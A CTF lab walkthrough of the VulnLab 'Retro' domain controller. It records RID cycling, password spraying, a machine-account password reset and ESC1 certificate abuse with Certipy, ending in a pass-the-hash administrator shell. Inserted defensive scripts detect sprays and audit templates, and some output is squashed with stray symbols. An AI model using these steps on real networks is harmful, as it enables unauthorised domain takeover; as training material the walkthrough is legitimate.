SMB         10.10.124.218   445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         10.10.124.218   445    DC               501: RETRO\Guest (SidTypeUser)
SMB         10.10.124.218   445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         10.10.124.218   445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         10.10.124.218   445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         10.10.124.218   445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         10.10.124.218   445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         10.10.124.218   445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         10.10.124.218   445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         10.10.124.218   445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         10.10.124.218   445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         10.10.124.218   445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.124.218   445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.124.218   445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.124.218   445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         10.10.124.218   445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         10.10.124.218   445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.124.218   445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.124.218   445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.124.218   445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.124.218   445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         10.10.124.218   445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         10.10.124.218   445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.124.218   445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         10.10.124.218   445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         10.10.124.218   445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         10.10.124.218   445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         10.10.124.218   445    DC               1109: RETRO\tblack (SidTypeUser)

You can also do this with impacket-lookupsids!

# you can use this command to filter users
lookupsid.py anonymous@10.10.124.218 -no-pass | grep 'SidTypeUser' | sed 's/RETRO\\//g' | awk '{print $2}' > clean_users.txt

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# lookupsid.py anonymous@10.10.124.218 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.124.218
[*] StringBinding ncacn_np:10.10.124.218[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)

Checking the capabilities of the trainee user

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# nxc smb 10.10.124.218 -u trainee -p 'trainee' --shares
SMB         10.10.124.218   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.124.218   445    DC               [+] retro.vl\trainee:trainee 
SMB         10.10.124.218   445    DC               [*] Enumerated shares
SMB         10.10.124.218   445    DC               Share           Permissions     Remark
SMB         10.10.124.218   445    DC               -----           -----------     ------
SMB         10.10.124.218   445    DC               ADMIN$                          Remote Admin
SMB         10.10.124.218   445    DC               C$                              Default share
SMB         10.10.124.218   445    DC               IPC$            READ            Remote IPC
SMB         10.10.124.218   445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.124.218   445    DC               Notes           READ            
SMB         10.10.124.218   445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.124.218   445    DC               Trainees        READ            

Now we’ve got “Notes” — have you seen this before? Nope? Let’s check it out!

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# smbclient -U 'trainee' //10.10.124.218/Notes
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 24 01:03:16 2023
  ..                                DHS        0  Wed Jul 26 12:54:14 2023
  ToDo.txt                            A      248  Mon Jul 24 01:05:56 2023

                6261499 blocks of size 4096. 2893217 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best
James

For further SMB enumeration, I used the -M spider_plus module in NetExec. You should always use this—it's a game-changer!

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# nxc smb 10.10.124.218 -u trainee -p 'trainee' -M spider_plus
SMB         10.10.124.218   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.124.218   445    DC               [+] retro.vl\trainee:trainee 
SPIDER_PLUS 10.10.124.218   445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.124.218   445    DC               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.124.218   445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.124.218   445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.124.218   445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.124.218   445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.124.218   445    DC               [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.124.218   445    DC               [*] Enumerated shares
SMB         10.10.124.218   445    DC               Share           Permissions     Remark
SMB         10.10.124.218   445    DC               -----           -----------     ------
SMB         10.10.124.218   445    DC               ADMIN$                          Remote Admin
SMB         10.10.124.218   445    DC               C$                              Default share
SMB         10.10.124.218   445    DC               IPC$            READ            Remote IPC
SMB         10.10.124.218   445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.124.218   445    DC               Notes           READ            
SMB         10.10.124.218   445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.124.218   445    DC               Trainees        READ            
SPIDER_PLUS 10.10.124.218   445    DC               [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.124.218.json".
SPIDER_PLUS 10.10.124.218   445    DC               [*] SMB Shares:           7 (ADMIN$, C$, IPC$, NETLOGON, Notes, SYSVOL, Trainees)
SPIDER_PLUS 10.10.124.218   445    DC               [*] SMB Readable Shares:  5 (IPC$, NETLOGON, Notes, SYSVOL, Trainees)
SPIDER_PLUS 10.10.124.218   445    DC               [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.124.218   445    DC               [*] Total folders found:  19
SPIDER_PLUS 10.10.124.218   445    DC               [*] Total files found:    7
SPIDER_PLUS 10.10.124.218   445    DC               [*] File size average:    1.24 KB
SPIDER_PLUS 10.10.124.218   445    DC               [*] File size min:        22 B
SPIDER_PLUS 10.10.124.218   445    DC               [*] File size max:        3.68 KB

Do you remember the users we found during the RID cycling attack? It’s time to spray some passwords using NetExec! But wait — I almost missed an important step. Before that, we need to validate the users using Kerberos with the Kerbrute tool.

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# kerbrute userenum -d retro.vl users.txt --dc 10.10.124.218

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/17/25 - Ronnie Flathers @ropnop

2025/02/17 21:22:22 >  Using KDC(s):
2025/02/17 21:22:22 >  	10.10.124.218:88

2025/02/17 21:22:22 >  [+] VALID USERNAME:	 Trainee@retro.vl
2025/02/17 21:22:22 >  [+] VALID USERNAME:	 Administrator@retro.vl
2025/02/17 21:22:22 >  Done! Tested 3 usernames (2 valid) in 0.560 seconds

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# kerbrute userenum -d retro.vl /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.124.218

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/17/25 - Ronnie Flathers @ropnop

2025/02/17 21:20:50 >  Using KDC(s):
2025/02/17 21:20:50 >  	10.10.124.218:88

2025/02/17 21:21:25 >  [+] VALID USERNAME:	 guest@retro.vl
2025/02/17 21:22:39 >  [+] VALID USERNAME:	 administrator@retro.vl
2025/02/17 21:39:55 >  [+] VALID USERNAME:	 Guest@retro.vl
2025/02/17 21:39:59 >  [+] VALID USERNAME:	 Administrator@retro.vl

Here, I’m checking with two wordlists — one containing the users we initially found and another with common usernames from the SecLists wordlist. This is crucial because, in some scenarios, you might not have any discovered users to work with.

I usually move on to pentesting after this step, but just a heads-up — you should also test for Kerberoasting and ASREPRoasting attacks at this stage. Just wanted to throw that out there!

It’s time to start password spraying!
🔥 You can use Kerbrute for this, but as I’ve said before, I love playing with NetExec!┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc smb 10.10.124.218 -u clean_users.txt -p clean_users.txt SMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)SMB 10.10.124.218 445 DC [-] retro.vl\Administrator:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\jburley:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\jburley:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] 
retro.vl\jburley:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:DC$ STATUS_LOGON_FAILURE🈁🈁🈁🈁🈁🈁🈁🈁🈁🈁SMB 10.10.124.218 445 DC [-] retro.vl\jburley:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [+] retro.vl\trainee:trainee Nothing interesting here since we already knew the trainee user could log in with the “trainee” password.But there’s something interesting in the output of impacket-lookupsids—did you notice that? 🤔 There’s a computer account: Banking$, and its password is the same as its name, which we also confirmed during the password spraying. Note: Whenever you discover a new user during enumeration, always add it to your wordlist for spraying laterSo, it’s a valid user with a valid password, but the error we got during spraying indicates that the password needs to be changed. 
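From the defender's side, the spray above is a very recognisable shape: one source address tries every known account within a few seconds, with many distinct accounts failing and at most one or two succeeding. The script below is an added example (not part of the write-up and not a NetExec or Kerbrute feature) that flags that shape in authentication records. The events are constructed sample data modelled on the accounts in the write-up; the field layout is my own rather than a Windows event schema, and the source addresses come from the 192.0.2.0/24 documentation range.

```python
"""Password-spray detection over authentication failures (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, source address, target account, outcome).
# Modelled on the accounts in the write-up; the layout is assumed, not a real event schema.
SAMPLE_EVENTS = [
    ("2025-02-17 21:45:01", "192.0.2.10", "Administrator", "FAILURE"),
    ("2025-02-17 21:45:01", "192.0.2.10", "Guest", "FAILURE"),
    ("2025-02-17 21:45:02", "192.0.2.10", "krbtgt", "FAILURE"),
    ("2025-02-17 21:45:02", "192.0.2.10", "DC$", "FAILURE"),
    ("2025-02-17 21:45:03", "192.0.2.10", "trainee", "FAILURE"),
    ("2025-02-17 21:45:03", "192.0.2.10", "BANKING$", "FAILURE"),
    ("2025-02-17 21:45:04", "192.0.2.10", "jburley", "FAILURE"),
    ("2025-02-17 21:45:04", "192.0.2.10", "tblack", "FAILURE"),
    ("2025-02-17 21:45:09", "192.0.2.10", "trainee", "SUCCESS"),   # the spray's hit
    # One user mistyping a password twice from a workstation: not a spray.
    ("2025-02-17 21:50:00", "192.0.2.77", "jburley", "FAILURE"),
    ("2025-02-17 21:50:07", "192.0.2.77", "jburley", "FAILURE"),
    ("2025-02-17 21:50:15", "192.0.2.77", "jburley", "SUCCESS"),
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def cluster_by_gap(records, gap):
    """Split time-sorted records into bursts: a new burst starts whenever the
    next record is more than `gap` after the previous one."""
    bursts, current = [], []
    for rec in records:
        if current and rec[0] - current[-1][0] > gap:
            bursts.append(current)
            current = []
        current.append(rec)
    if current:
        bursts.append(current)
    return bursts


def detect_spray(events, gap=timedelta(minutes=5), min_accounts=5):
    """Flag every source whose burst of failures touches at least `min_accounts`
    distinct accounts. Many accounts with few attempts each is what separates a
    spray from one user forgetting a password (many attempts, one account).
    Successes inside the same burst are reported as hits."""
    by_source = defaultdict(list)
    for ts, src, user, outcome in events:
        by_source[src].append((_ts(ts), user, outcome))
    findings = []
    for src, recs in by_source.items():
        recs.sort(key=lambda r: r[0])
        for burst in cluster_by_gap(recs, gap):
            failed = {u for _, u, o in burst if o == "FAILURE"}
            if len(failed) < min_accounts:
                continue
            findings.append({
                "source": src,
                "first": burst[0][0],
                "last": burst[-1][0],
                "accounts": sorted(failed),
                "hits": [u for _, u, o in burst if o == "SUCCESS"],
            })
    return findings


if __name__ == "__main__":
    for f in detect_spray(SAMPLE_EVENTS):
        print(f"spray from {f['source']} {f['first']:%H:%M:%S}-{f['last']:%H:%M:%S}: "
              f"{len(f['accounts'])} accounts, hits={f['hits']}")
```

Run against the sample, it reports a single burst from 192.0.2.10 covering all eight accounts with trainee as the hit, and stays silent on the workstation user who mistyped twice. The thresholds are the knob that matters: too low and help-desk traffic fires it, too high and a slow spray (one password per hour across all accounts) slips under the gap. In the write-up the spray ends with the BANKING$ account authenticating but being told its password must be changed, which the next step deals with.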
To change the BANKING$ password, we need to modify the /etc/krb5.conf file and use the kpasswd tool to update it.

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# cat /etc/krb5.conf
[libdefaults]
    default_realm = RETRO.VL
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true
    ticket_lifetime = 24h
    renew_lifetime = 7d

[realms]
    RETRO.VL = {
        kdc = 10.10.124.218
        admin_server = 10.10.124.218
        default_domain = RETRO.VL
    }

[domain_realm]
    .retro.vl = RETRO.VL
    retro.vl = RETRO.VL

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# kpasswd BANKING$
Password for BANKING$@RETRO.VL:
Enter new password:
Enter it again:
Password changed.

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# banking1234

Checking for Validation of the Password Just Set

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# nxc smb 10.10.124.218 -u 'BANKING$' -p 'banking1234'
SMB         10.10.124.218   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.124.218   445    DC               [+] retro.vl\BANKING$:banking1234

AD CS as Part of the Things You Need to Check

I will use the NetExec module for this first, then follow up with Certipy by Oliver Lyak, a fantastic tool for all AD CS attacks, for additional AD CS scanning and exploitation.

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# nxc ldap 10.10.124.218 -u trainee -p 'trainee' -M adcs
SMB         10.10.124.218   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP        10.10.124.218   389    DC               [+] retro.vl\trainee:trainee
ADCS        10.10.124.218   389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.124.218   389    DC               Found PKI Enrollment Server: DC.retro.vl
ADCS        10.10.124.218   389    DC               Found CN: retro-DC-CA

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# certipy find -u trainee -p 'trainee' -vulnerable -stdout -dc-ip 10.10.124.218
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

Now that we know it's vulnerable to ESC1, it's time to dig deeper and exploit it!

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# certipy req -u 'banking$'@retro.vl -p 'banking1234' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator' -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc.retro.vl' at '8.8.8.8'
[+] Trying to resolve 'RETRO.VL' at '8.8.8.8'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.124.218[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.124.218[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 9
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.124.218
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d9-------------

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# evil-winrm -i dc.retro.vl -u administrator -H 252fac7066d9--------

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
retro\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls

    Directory: C:\Users\Administrator\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2023  12:38 PM             36 root.txt

*Evil-WinRM* PS C:\Users\Administrator\desktop> cat root.txt
VL{8-----------------------------
*Evil-WinRM* PS C:\Users\Administrator\desktop>

Exploiting ESC1 in AD CS

After confirming that the AD CS instance is vulnerable to ESC1 (Enterprise CA Security Issue 1), we move on to exploitation using Certipy. This attack abuses misconfigured certificate templates that allow low-privileged users or machine accounts to request certificates with privileged user UPNs (User Principal Names). These certificates can then be used for authentication and privilege escalation.

Step 1: Requesting a Certificate as Administrator

We use the certipy req command to request a certificate as the Administrator user while authenticating with the compromised Banking$ machine account.

certipy req -u 'banking$'@retro.vl -p 'banking1234' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator' -key-size 4096 -debug

-u 'banking$'@retro.vl -p 'banking1234': We authenticate as the Banking$ machine account.
-c 'retro-DC-CA' -target 'dc.retro.vl': Specifies the Certificate Authority (CA) and domain controller.
-template 'RetroClients': Requests a certificate using the vulnerable template.
-upn 'administrator': Sets the UPN to Administrator, essentially tricking the CA into issuing a certificate for a highly privileged account.
-key-size 4096: Generates a strong RSA key; the template's minimum RSA key length is 4096, as the Certipy output above shows.

If the template is misconfigured and allows us to specify arbitrary UPNs, we successfully obtain a certificate for Administrator. The output confirms that the certificate was issued and saved as administrator.pfx.

Step 2: Using the Certificate for Authentication

With the certificate in hand, we use certipy auth to authenticate as Administrator and retrieve their NTLM hash.

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.124.218

-pfx 'administrator.pfx': Uses the obtained certificate for authentication.
-username 'administrator' -domain 'retro.vl': Specifies the target user and domain.
-dc-ip 10.10.124.218: Specifies the domain controller's IP.

The output confirms that we successfully retrieved a TGT (Ticket Granting Ticket) and the NTLM hash of the Administrator account:

aad3b435b51404eeaad3b435b51404ee:252fac706----------

Step 3: Getting a Shell as Administrator

With the Administrator NTLM hash, we use Evil-WinRM to get a fully privileged shell on the domain controller.

evil-winrm -i dc.retro.vl -u administrator -H 252fac7066----------------

And just like that… we're in! 🎉

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
retro\administrator

Navigating to the desktop and reading the root.txt flag confirms full domain compromise!

VL{8b-----------------

Final Thoughts

This machine was a great example of how misconfigured AD CS templates can lead to full domain takeover. By abusing ESC1, we were able to escalate from a low-privileged machine account (Banking$) to Administrator — without even needing to crack any hashes!

🔹 Key Takeaways:
✅ Always check for AD CS misconfigurations.
✅ ESC1 allows for privilege escalation by requesting certificates with privileged UPNs.
✅ Certipy is an excellent tool for AD CS enumeration and exploitation.

And that's another VulnLab machine pwned! 🔥

References

If you want references for this attack, check out our blog post on it!
Escape Unveiled: Active Directory ADCS Exploit Walkthrough

Do You Wanna Chat with Maverick?🥂

Don't forget to follow me on LinkedIn and Twitter, and give me some respect on Hack The Box! I love chatting with like-minded people, sharing knowledge, and learning from everyone. Happy hacking! 🚀

Retro was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
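The write-up's first takeaway, "always check for AD CS misconfigurations", comes down to the handful of template settings Certipy listed for RetroClients: the enrollee supplies the subject, the template allows client authentication, no manager approval or authorized signature is required, and a broad group (here Domain Computers) can enroll. The script below is an added example, neither Certipy's code nor the author's, that parses a Certipy-style template record (the RetroClients block from the output above is reused as sample input, trimmed to the template fields) and evaluates each of those conditions separately; it then applies the same check to a hardened copy of the template so the settings that block ESC1 are visible. The BROAD_PRINCIPALS and AUTH_EKUS sets are my assumptions and should be extended with your own broad groups.

```python
"""ESC1 audit of a Certipy-style template record (added example, not Certipy's code)."""

# Sample input: the RetroClients template as Certipy printed it in the write-up,
# trimmed to the template fields. Certipy prints multi-valued fields as one
# principal per continuation line, which the parser below handles.
RETRO_CLIENTS = r"""
Template Name                       : RetroClients
Display Name                        : Retro Clients
Certificate Authorities             : retro-DC-CA
Enabled                             : True
Client Authentication               : True
Enrollment Agent                    : False
Any Purpose                         : False
Enrollee Supplies Subject           : True
Certificate Name Flag               : EnrolleeSuppliesSubject
Enrollment Flag                     : None
Extended Key Usage                  : Client Authentication
Requires Manager Approval           : False
Requires Key Archival               : False
Authorized Signatures Required      : 0
Minimum RSA Key Length              : 4096
Enrollment Rights                   : RETRO.VL\Domain Admins
                                      RETRO.VL\Domain Computers
                                      RETRO.VL\Enterprise Admins
"""

# Assumption: principals that effectively mean "any domain account" or
# "any domain-joined machine" (a machine account is how the write-up got in).
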